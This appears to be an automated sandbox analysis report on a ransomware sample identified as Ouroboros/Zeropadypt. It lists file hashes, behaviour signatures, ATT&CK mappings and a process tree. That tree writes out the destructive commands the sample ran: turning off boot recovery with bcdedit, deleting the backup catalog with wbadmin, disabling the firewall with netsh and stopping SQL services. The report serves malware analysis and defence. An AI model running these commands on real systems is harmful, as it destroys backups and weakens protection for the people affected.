Analysis

  • max time kernel
    56s
  • max time network
    115s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    17-09-2020 15:28

General

  • Target

    60d53d840285d033deb6ccf011665b612721a5d99a2d132d3a8adcf99fbf0fc1.exe

  • Size

    375KB

  • MD5

    d5882c247d498f62deced08d118e122f

  • SHA1

    d889058027e41165b300e2b1864e45b33d0ec142

  • SHA256

    60d53d840285d033deb6ccf011665b612721a5d99a2d132d3a8adcf99fbf0fc1

  • SHA512

    5c714e72e14dac9c4da2cd29cc4d73d8e62537b1bb92bae3f3ed8b8109bf80d6647e0f1c634198af96a239c2511a7bbb37d63e7dbd0b3241a1f3869b3b32b4f2

Malware Config

Signatures

  • Ouroboros/Zeropadypt

    Ransomware family based on open-source CryptoWire.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops autorun.inf file 1 TTPs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\60d53d840285d033deb6ccf011665b612721a5d99a2d132d3a8adcf99fbf0fc1.exe
    "C:\Users\Admin\AppData\Local\Temp\60d53d840285d033deb6ccf011665b612721a5d99a2d132d3a8adcf99fbf0fc1.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3612
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c net stop SQLWriter
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:640
      • C:\Windows\SysWOW64\net.exe
        net stop SQLWriter
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2996
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop SQLWriter
          4⤵
            PID:644
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c net stop SQLBrowser
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:860
        • C:\Windows\SysWOW64\net.exe
          net stop SQLBrowser
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1096
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop SQLBrowser
            4⤵
              PID:1264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1252
          • C:\Windows\SysWOW64\net.exe
            net stop MSSQLSERVER
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1800
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop MSSQLSERVER
              4⤵
                PID:1876
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c net stop MSSQL$CONTOSO1
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2136
            • C:\Windows\SysWOW64\net.exe
              net stop MSSQL$CONTOSO1
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2420
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop MSSQL$CONTOSO1
                4⤵
                  PID:2572
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c net stop MSDTC
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2784
              • C:\Windows\SysWOW64\net.exe
                net stop MSDTC
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:740
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop MSDTC
                  4⤵
                    PID:3992
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                2⤵
                  PID:4028
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no
                  2⤵
                    PID:2188
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
                    2⤵
                      PID:3712
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c net stop SQLSERVERAGENT
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:964
                      • C:\Windows\SysWOW64\net.exe
                        net stop SQLSERVERAGENT
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:292
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SQLSERVERAGENT
                          4⤵
                            PID:60
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                        2⤵
                          PID:1104
                          • C:\Windows\SysWOW64\net.exe
                            net stop MSSQLSERVER
                            3⤵
                              PID:488
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop MSSQLSERVER
                                4⤵
                                  PID:1288
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c net stop vds
                              2⤵
                                PID:1828
                                • C:\Windows\SysWOW64\net.exe
                                  net stop vds
                                  3⤵
                                    PID:1644
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop vds
                                      4⤵
                                        PID:2664
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
                                    2⤵
                                      PID:2540
                                      • C:\Windows\SysWOW64\netsh.exe
                                        netsh advfirewall set currentprofile state off
                                        3⤵
                                          PID:2804
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c netsh firewall set opmode mode=disable
                                        2⤵
                                          PID:3384
                                          • C:\Windows\SysWOW64\netsh.exe
                                            netsh firewall set opmode mode=disable
                                            3⤵
                                              PID:1404

                                        Network

                                        MITRE ATT&CK Matrix ATT&CK v6

                                        Initial Access

                                        Replication Through Removable Media

                                        1
                                        T1091

                                        Persistence

                                        Modify Existing Service

                                        1
                                        T1031

                                        Credential Access

                                        Credentials in Files

                                        1
                                        T1081

                                        Lateral Movement

                                        Replication Through Removable Media

                                        1
                                        T1091

                                        Collection

                                        Data from Local System

                                        1
                                        T1005

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • memory/60-20-0x0000000000000000-mapping.dmp
                                        • memory/292-19-0x0000000000000000-mapping.dmp
                                        • memory/488-22-0x0000000000000000-mapping.dmp
                                        • memory/640-0-0x0000000000000000-mapping.dmp
                                        • memory/644-2-0x0000000000000000-mapping.dmp
                                        • memory/740-13-0x0000000000000000-mapping.dmp
                                        • memory/860-3-0x0000000000000000-mapping.dmp
                                        • memory/964-18-0x0000000000000000-mapping.dmp
                                        • memory/1096-4-0x0000000000000000-mapping.dmp
                                        • memory/1104-21-0x0000000000000000-mapping.dmp
                                        • memory/1252-6-0x0000000000000000-mapping.dmp
                                        • memory/1264-5-0x0000000000000000-mapping.dmp
                                        • memory/1288-23-0x0000000000000000-mapping.dmp
                                        • memory/1404-30-0x0000000000000000-mapping.dmp
                                        • memory/1644-25-0x0000000000000000-mapping.dmp
                                        • memory/1800-7-0x0000000000000000-mapping.dmp
                                        • memory/1828-24-0x0000000000000000-mapping.dmp
                                        • memory/1876-8-0x0000000000000000-mapping.dmp
                                        • memory/2136-9-0x0000000000000000-mapping.dmp
                                        • memory/2188-16-0x0000000000000000-mapping.dmp
                                        • memory/2420-10-0x0000000000000000-mapping.dmp
                                        • memory/2540-27-0x0000000000000000-mapping.dmp
                                        • memory/2572-11-0x0000000000000000-mapping.dmp
                                        • memory/2664-26-0x0000000000000000-mapping.dmp
                                        • memory/2784-12-0x0000000000000000-mapping.dmp
                                        • memory/2804-28-0x0000000000000000-mapping.dmp
                                        • memory/2996-1-0x0000000000000000-mapping.dmp
                                        • memory/3384-29-0x0000000000000000-mapping.dmp
                                        • memory/3612-31-0x0000000001B50000-0x0000000001B51000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3612-32-0x0000000002350000-0x0000000002351000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3612-33-0x0000000001B50000-0x0000000001B51000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3612-34-0x0000000002350000-0x0000000002351000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3612-35-0x0000000001B50000-0x0000000001B51000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3612-41-0x0000000001B50000-0x0000000001B51000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3612-42-0x0000000002350000-0x0000000002351000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3612-43-0x0000000001B50000-0x0000000001B51000-memory.dmp
                                          Filesize

                                          4KB

                                        • memory/3712-17-0x0000000000000000-mapping.dmp
                                        • memory/3992-14-0x0000000000000000-mapping.dmp
                                        • memory/4028-15-0x0000000000000000-mapping.dmp